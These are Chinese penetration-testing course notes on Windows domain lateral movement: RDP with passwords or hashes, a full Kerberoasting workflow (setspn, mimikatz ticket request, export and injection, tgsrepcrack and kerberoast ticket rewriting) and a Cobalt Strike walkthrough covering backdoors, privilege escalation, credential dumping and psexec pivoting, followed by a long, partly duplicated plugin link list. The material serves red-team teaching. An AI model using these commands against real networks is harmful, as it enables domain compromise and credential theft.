python大型网站开发,网站排行查询,宁波城乡建设局网站,做视频自媒体要投稿几个网站这节课主要讲spn和rdp协议#xff0c;
案例一域横向移动RDP传递-Mimikatz
rdp是什么#xff0c;rdp是一个远程的链接协议#xff0c;在linux上面就是ssh协议#xff0c;
我们在前期信息收集的时候#xff0c;得到一些hash值和明文密码可以进行一些相关协议的链接的
案例一域横向移动RDP传递-Mimikatz
rdp是什么rdp是一个远程的链接协议在linux上面就是ssh协议
我们在前期信息收集的时候得到一些hash值和明文密码可以进行一些相关协议的链接的比如之前讲的ipcvmismb协议除了这些rdp协议也是可以进行链接的
rdp协议对应的开放端口就是3389
明文密码连接时很简单得可以直接xinr输入mstsc调用出来远程连接窗口 2.mstsc.exe /console /v:192.168.3.21 /admin
3.linux: rdesktop 192.168.3.21:3389
用hash也可以链接但是有部分系统有还要执行一下这个命令 windows Server需要开启 Restricted Admin mode在Windows 8.1和Windows Server 2012 R2中默认开启 同时如果Win 7 和Windows Server 2008 R2安装了2871997、2973351补丁也支持
REG ADD HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f
就比较鸡肋
rdp协议判断判断对方是否开启了3389端口即可端口扫描 案例二域横向移动SPN服务-探针,请求,导出,破解,重写
参考链接https://www.cnblogs.com/backlion/p/8082623.html spn扫描也可以叫扫描Kerberos服务实例名称
他的攻击流程在思维导图里面写了探针spn服务请求服务票据导出服务票据破解服务票据重写服务票据吃西瓜
设计的服务mssqlwsmanexchangeiermservhyper-v host等等在参考里面有详细
一般spn攻击可以通过网络端口扫描通过端口开放可以判断内网主机的一些其他服务不过进行端口扫描可能会遇到防火墙比如在用namp扫描的时候遇到防火墙就会扫描不准确
spn扫描就可以避免这个防火墙他扫描是走的Kerberos服务走的地方不一样SPN查询是普通Kerberos票据的一部分不会触发防火墙杀软
攻击流程探针spn服务((看一下有那些服务)请求服务票据根据不同的服务选择要操作的服务然后请求导出服务票据请求之后会建立会话连接在用工具把数据导出来破解服务票据导出来之后数据的加密形式是可以破解的通过破解找到这个链接的东西重写服务票据吃西瓜
黑客可以使用有效的域用户的身份验证票证TGT去请求运行在服务器上的一个或多个目标服务的服务票证。DC在活动目录中查找SPN并使用与SPN关联的服务帐户加密票证以便服务能够验证用户是否可以访问。请求的Kerberos服务票证的加密类型是RC4_HMAC_MD5这意味着服务帐户的NTLM密码哈希用于加密服务票证。黑客将收到的TGS票据离线进行破解即可得到目标服务帐号的HASH这个称之为Kerberoast攻击。如果我们有一个为域用户帐户注册的任意SPN那么该用户帐户的明文密码的NTLM哈希值就将用于创建服务票证。这就是Kerberoasting攻击的关键。
以下操作都在PowerShell进行
探针
setspn -q */* 可以看到域内主机的详细服务目标
setspn -q */* | findstr MSSQL 这个命令就是寻找特定的服务这个就是寻找的mssqk服务
然后删除别的票据 请求
Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList [服务名] 再查看凭据 这就多了一条刚刚的请求凭据产生了票据之后再用mimikatz给他导出来
也可以使用mimikatz请求 mimikatz.exe kerberos::ask /target:[服务名]
请求之后就会产生出凭据
导出
用mimikatz导出来
mimikatz.exe kerberos::list /export 破解
用一个python脚本写一个字典爆破、
因为在破解的时候是利用到一个脚本最好还是在自己本机上破解
把要爆破的凭据复制到爆破文件的目录来 python3 .\tgsrepcrack.py .\[密码文件.txt] .\[凭据.kirbi] python3 .\tgsrepcrack.py .\password.txt .\1-40a00000-jerryMSSQLSvcSrv-DB-0day.0day.org1433-0DAY.ORG.kirbi
然后直接运行它爆破 域控的服务被请求的时候会自动进行验证所以里面就有密码信息密码就包含在凭据里面 重写
python kerberoast.py -p Password123 -r xxxx.kirbi -w PENTESTLAB.kirbi -u 500
-p后面跟的是得到的密码-r就是凭据 -w重写成一个凭据文件 -u就是用户的编号500是值得管理员的编号 python kerberoast.py -p Password123 -r xxxx.kirbi -w PENTESTLAB.kirbi -g 512
-g值得是组512就是管理员组 mimikatz.exe kerberos::ptt xxxx.kirbi # 将生成的票据注入内存
他就是伪造了一个管理员用户管理员组的用户的票据进行链接
但是我们在这种服务破解破解的服务账户并不是管理员账户 链接上去之后权限也比较小但是管理员账户的破解不了的在这个协议里面不显示
案例三域横向移动测试流程一把梭哈-CobaltStrike初体验 把前面涉及到的东西总结了在实战情况下我们的一个操作全部实战操作把会遇到问题都解决掉
CobaltStrike4.0用户手册
https://pan.baidu.com/s/15DCt2Rzg5cZjXnEuUTgQ9Q 提取码:dtm2
CobaltStrike也成为多人认证工具也叫打枪工具
简单介绍他呢有一个团队服务器可以通过任意终端连接到靶机上可以建立一个多人攻击一个靶机的场景
面对的内网环境 大概流程
启动-配置-监听-执行-上线-提权-信息收集(网络凭证定位等)-渗透 关于启动及配置讲解
这个工具需要java环境自己装一下jdk和java
来到那个工具目录下启动文件在文件名字后面跟上服务器ip和密码这个密码后续链接工具会用到 公共服务区配置好之后在来到自己的本机启动CobaltStrike
输入服务器ip端口不用变账户随便输一个密码输入服务器设置的密码 就启动完成了,它可以理解为是一个远控工具然后这个工具又带有一些渗透功能。
这个工具就是先控制电脑控制服务器然后在在肉鸡上面做一些操作
然后这个工具是多人操作的有时候需要区分谁搞的那个肉鸡这个就可以通过配置一个监听器解决从你这个监听器过来的就是你的主机而从别的监听器过来的就是别人的肉鸡监听器就是配置木马的传输的管道 常见的就是dnshttpsmbc2这里老师选择的c2 然后配置一下基本信息名字ip端口然后就生成监听文件进入监听状态然后就是生成后门文件 红色框框的这个是windows64位的后门文件ms office是宏病毒这个病毒是插入到word类的文件我们选择就用windwos倒数第二个后门 64兼容模式选择上 然后后门绑定好监听器 然后利用webshell把后门文件上传到肉鸡上面运行它
肉鸡上线还打开试图看一下基础信息 关于提权及插件加载
在视图界面选中机器右键。“Interact”打开命令行终端“Session”链接的管理和笔记等功能中间是包括端口扫描、黄金票据、运行MimiKatz等常用功能 自带的提权只有两个所以要加载一些插件 点击加载这个插件然后再点upload加载上之后提权哪里的选项就多了 选择这个ms14-058直接提权操作 提权速度过慢
选择“Session”“Sleep”设置为1或者0 直接把延关掉 关于信息收集命令讲解
探针内网架构 net view 选择“View”“Targets”会展示所有已探测的信息 输入“net computers”探测所有的机器的名字与IP
输入“net dclist”获取当前域控的信息
输入“net user”获取当前用户信息
输入“shell net user /domain”加“shell”调用cmd执行命令得到域内所有用户的名字
选择“Access”“Run Mimikatz”或者输入“mimikatz”来运行mimikatz
选择“View”“Credentials”会展示mimikatz收集的密码信息 回到“Targets”界面选中一台机器右键“Jump”选择合适的攻击方法进攻。这里以“psexec”为例 ssh是linux的等等 用系统权限的主机去链接选择后监听器账户密码可以根据刚刚获取的套用试试
然后发现这台电脑他没有联网我们该怎么拿下他呢
这时候域内有另一台主机是开启外网的我们在去攻击那台主机 这台肉鸡就上线了
问题
可以upload上传工具
自助工具如果提权成功没成功也可以上传吖可以通过上次其它第三方的软件进行辅助这里把Ladon上传上去
Ladon一款用于大型内网渗透的多线程插件化综合扫描神器含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell支持批量A段/B段/C段以及跨网段扫描支持URL、主机、域名列表扫描。
代理问题
刚刚老师为了链接效果给每一台主机都开外网了但是外网一关就下线了这该怎么办。
这就涉及到代理
而对于那个没有开外网的主机是正向链接还是反向链接好呢 看到这个图sqlserver就是没有开外网的靶机webserver是有一个外网可以对外链接但是webserver有内网网卡是可以和sqlserver正常链接这时候我们就可以让sqlserver把数据传输给webserve在让webserver传输给我
反向代理
但这里有一个问题结果回显不过来这就需要到代理隧道 关于试图自动化功能讲解
涉及资源
kerberos中的spn详解https://www.cnblogs.com/backlion/p/8082623.html
kerberoasthttps://github.com/nidem/kerberoast
taowu-cobalt-strike插件-小迪精选https://github.com/pandasec888/taowu-cobalt-strike
Cobalt Strike 4.0手册https://pan.baidu.com/s/15DCt2Rzg5cZjXnEuUTgQ9Q 提取码dtm2
红队实战演练环境https://pan.baidu.com/s/14eVDglqba1aRXi9BGcBbug 提取码taqu
Erebus插件-小迪使用https://github.com/DeEpinGh0st/Erebus
Cobalt Strike插件https://github.com/rsmudge/Elevatekit
Cobalt Strike插件https://github.com/harleyQu1nn/AggressorScripts
Cobalt Strike插件https://github.com/bluscreenofjeff/AggressorScripts
Cobalt Strike插件https://github.com/michalkoczwara/aggressor_scripts_collection
Cobalt Strike插件https://github.com/vysecurity/Aggressor-VYSEC
Cobalt Strike插件https://github.com/killswitch-GUI/CobaltStrike-ToolKit
Cobalt Strike插件https://github.com/ramen0x3f/AggressorScripts
Cobalt Strike插件https://github.com/FortyNorthSecurity/AggressorAssessor
Cobalt Strike插件https://github.com/threatexpress/persistence-aggressor-script
Cobalt Strike插件https://github.com/threatexpress/aggressor-scripts
Cobalt Strike插件https://github.com/branthale/CobaltStrikeCNA
Cobalt Strike插件https://github.com/gaudard/scripts/tree/master/red-team/aggressor
Cobalt Strike插件https://github.com/001SPARTaN/aggressor_scripts
Cobalt Strike插件https://github.com/Und3rf10w/Aggressor-scripts
Cobalt Strike插件https://github.com/rasta-mouse/Aggressor-Script
Cobalt Strike插件https://github.com/vysec/Aggressor-VYSEC
Cobalt Strike插件https://github.com/threatexpress/aggressor-scripts
Cobalt Strike插件https://github.com/threatexpress/red-team-scripts
Cobalt Strike插件https://github.com/vysecurity/CVE-2018-4878
Cobalt Strike插件https://github.com/harleyQu1nn/AggressorScripts
Cobalt Strike插件https://github.com/bluscreenofjeff/AggressorScripts
Cobalt Strike插件https://github.com/QAX-A-Team/CobaltStrike-Toolset
Cobalt Strike插件https://github.com/ars3n11/Aggressor-Scripts
Cobalt Strike插件https://github.com/michalkoczwara/aggressor_scripts_collection
Cobalt Strike插件https://github.com/killswitch-GUI/CobaltStrike-Toolkit
Cobalt Strike插件https://github.com/ZonkSec/persistence-aggressor-script
Cobalt Strike插件https://github.com/rasta-mouse/Aggressor-Script
Cobalt Strike插件https://github.com/RhinoSecurityLabs/Aggressor-Scripts
Cobalt Strike插件https://github.com/Kevin-Robertson/Inveigh
Cobalt Strike插件https://github.com/Genetic-Malware/Ebowla
Cobalt Strike插件https://github.com/001SPARTaN/aggressor_scripts
Cobalt Strike插件https://github.com/gaudard/scripts/tree/master/red-team/aggressor
Cobalt Strike插件https://github.com/branthale/CobaltStrikeCNA
Cobalt Strike插件https://github.com/oldb00t/AggressorScripts
Cobalt Strike插件https://github.com/p292/Phant0m_cobaltstrike
Cobalt Strike插件https://github.com/p292/DDEAutoCS
Cobalt Strike插件https://github.com/secgroundzero/CS-Aggressor-Scripts
Cobalt Strike插件https://github.com/skyleronken/Aggressor-Scripts
Cobalt Strike插件https://github.com/tevora-threat/aggressor-powerview
Cobalt Strike插件https://github.com/tevora-threat/PowerView3-Aggressor
Cobalt Strike插件https://github.com/threatexpress/persistence-aggressor-script
Cobalt Strike插件https://github.com/FortyNorthSecurity/AggressorAssessor
Cobalt Strike插件https://github.com/mdsecactivebreach/CACTUSTORCH
Cobalt Strike插件https://github.com/C0axx/AggressorScripts
Cobalt Strike插件https://github.com/offsecginger/AggressorScripts
Cobalt Strike插件https://github.com/tomsteele/cs-magik
Cobalt Strike插件https://github.com/bitsadmin/nopowershell
Cobalt Strike插件https://github.com/SpiderLabs/SharpCompile 作者shtome https://www.bilibili.com/read/cv14802167/ 出处bilibili fa cai
